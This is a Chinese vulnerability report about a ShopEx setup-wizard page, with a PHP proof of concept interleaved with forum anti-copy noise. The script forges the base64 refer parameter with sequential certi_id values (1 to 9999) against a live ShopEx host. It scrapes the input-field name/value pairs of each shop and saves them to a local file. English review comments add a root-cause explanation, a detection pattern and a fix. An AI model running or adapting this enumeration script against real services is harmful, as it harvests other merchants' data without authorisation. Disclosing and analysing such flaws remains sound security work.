|
简要描述:
ShopEx某接口缺陷,可遍历所有网站
详细说明:
问题出现在shopex 网店使用向导页面

http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=

refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}

我们修改certi_id 即可遍历所有使用了ShopEx程序的网站

( G$ x0 v6 D, Z' ?<?php0 b. { X: U( g! N0 r: L: V
8 [% p* l9 a! w% W9 g
// NOTE(review): the listing as pasted is interleaved with forum anti-copy
// noise; the code lines are kept verbatim here, only comments are added.
//
// Proof-of-concept driver from the report. The only input that changes
// between requests is a sequential integer certi_id (1..9999), handed to
// ShowshopExD(). Per the report, the wizard page renders whichever shop the
// id names without checking that the caller owns it (an IDOR), which is why
// this loop walks every registered site. Detection note: one client issuing
// thousands of /step2.php requests whose refer blob differs only in
// certi_id is the pattern to alert on.
for ($i=1; $i < 10000; $i++) { // enumerate
% |3 O3 W& H; ^' Y
( ?7 I% p" A l% _3 x3 D8 h% d/ N5 q ShowshopExD($i);
+ d7 D4 D. v" D M8 ?. J/ L
g7 l: L6 \) g) d0 T8 l4 C: l }
# t3 I p/ C! b- e p9 }+ M- M3 t* }# r1 S9 C8 A5 P
// Fetches the ShopEx setup-wizard page for one certi_id and, if the server
// echoes the forged refer blob back (taken as "id accepted"), scrapes the
// name/value pairs of every <input type="text"> on the page, prints them
// and appends them to a local file.
//
// Root cause (per the report): the wizard identifies the shop solely by the
// certi_id carried in the client-supplied refer parameter, which is plain
// base64 of a JSON object — nothing this script sends is signed or bound
// to a session, so any integer is accepted.
// NOTE(review): the fix is server-side — resolve the shop from the
// authenticated session, or make refer a server-issued, signed and expiring
// token, and rate-limit the endpoint. Merely changing how refer is encoded
// (the report's closing suggestion) does not help while the id is still
// chosen by the client.
//
// The listing as pasted is interleaved with forum anti-copy noise; code
// lines are kept verbatim, only comments are added.
//
// @param int|string $cid  certi_id to try; coerced with intval() below.
// @return void  side effects only: stdout and c:/shopEx.txt.
function ShowshopExD($cid) {
2 g2 |& G! G/ y' @5 @
6 t. F7 Q4 C: T* B: g9 n; g. m- M, H& G6 Y $url='http://guide.ecos.shopex.cn/step2.php';
7 V' ~. K! @0 J" J) Y8 k, A9 J" C6 n( N' T
// Forge the refer parameter: base64(JSON) with the caller-chosen id; the
// callback_url is a dummy value.
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
+ x `' T/ Q8 d0 o. A- p* _* r" y/ p
$url = $url.'?refer='.$refer;. W" D h, Z `; @
3 Q, h7 M( F0 A3 N7 K. _" L
// Fetch the page; RETURNTRANSFER makes curl_exec() return the body as a string.
$ch = curl_init($url);: n/ U$ X5 `7 N, K$ `# L
3 q) C& G5 ]% \1 s6 w curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;6 B( p3 v# x2 B, i, K8 E
- \% [. f7 l* u+ i3 v& n
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
" V: G: ]! f2 O9 ~# o- H- r
/ j8 w3 L t2 r0 x) E& X$ L $result = curl_exec($ch);2 P% A0 p0 ]% C, s* G
// Re-encode the body as GB2312 — presumably for a Chinese Windows console;
// TODO confirm.
6 X% {# B0 |9 b# O: K $result = mb_convert_encoding($result, "gb2312", "UTF-8");7 k/ E! T4 o6 i
// The server echoing the refer string back is treated as "this certi_id
// exists".
. {4 E" Z; j- e, J& ?; e: X5 ] if(strpos($result,$refer))3 k% ]0 i' r0 D
" R& J ` @' K9 c. y; z- p0 ]* W {
3 Z' D8 ^( f& D1 A$ P D
// Append results to a local file; the handle is not checked for failure.
: }* v9 J9 t7 G, Z% u $fp = fopen("c:/shopEx.txt",'ab'); // save to file
6 m, [; v* l# h6 V
// First regex grabs the attribute text of each self-closing
// <input type="text" .../>; the second pulls name and value out of it.
& T9 D' w+ Y2 C( I8 y p( p3 u preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
8 Y' e: }8 y( X! ?) Y4 A7 ^& p$ i) O) q# g9 E, l+ d
foreach ($value[1] as $key) {! T3 P, F" j2 E
! C) x7 F- C/ V+ W) r preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);* S5 ^: {5 m3 V. j, M* f
: \7 T/ f8 {' G4 Q' D6 }5 h
// Print "name:value" and write the same line to the file.
echo $res[1][0].':'.$res[3][0]."\r\n";9 v! P( Z; @' v2 n" _+ E
# ^0 D/ ?& w- p5 [$ K" Q5 ]0 P $col =$res[1][0].':'.$res[3][0]."\r\n";
J, i! T' q6 K' f8 d5 I+ z2 r
' z4 |$ g7 d* I7 E. U. B fwrite($fp, $col, strlen($col)); ! K; X( A5 j- \7 l; }' J5 d6 `0 V
/ \1 I, _, ~3 Q$ a- ]
}
4 [9 G1 Z! X+ c3 _- O3 I- p: A; h! _
// Separator between sites on stdout; the file is closed per hit.
) F% r9 R3 g) w! ^1 z0 y( ? echo '--------------------------------'."\r\n";. T0 a$ |) x! E- I& x9 u6 j4 Y
: ]! i1 ?3 b8 `) G7 X& h% O fclose($fp);
8 Y: l- q) D; C! E4 ~* d5 S4 V( }* e1 O2 J3 [+ C5 M2 K8 T
}
8 K6 q7 h4 F* I. J% g
// Flush stdout so progress is visible while the loop runs, then release the
// curl handle.
& F1 a1 X E1 N) W' w flush();
% {) H; Z5 K+ x5 s# h4 G) b/ N) @
# I4 N8 @7 ]# Z% @+ G; | curl_close($ch);
) F5 p& j4 ]8 v ]: a( N7 D
* j t) O/ J F }7 B, ]/ k' c9 c' C, E
w8 Q6 W( h2 ^& e- n
?>
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer换成其他加密方式
|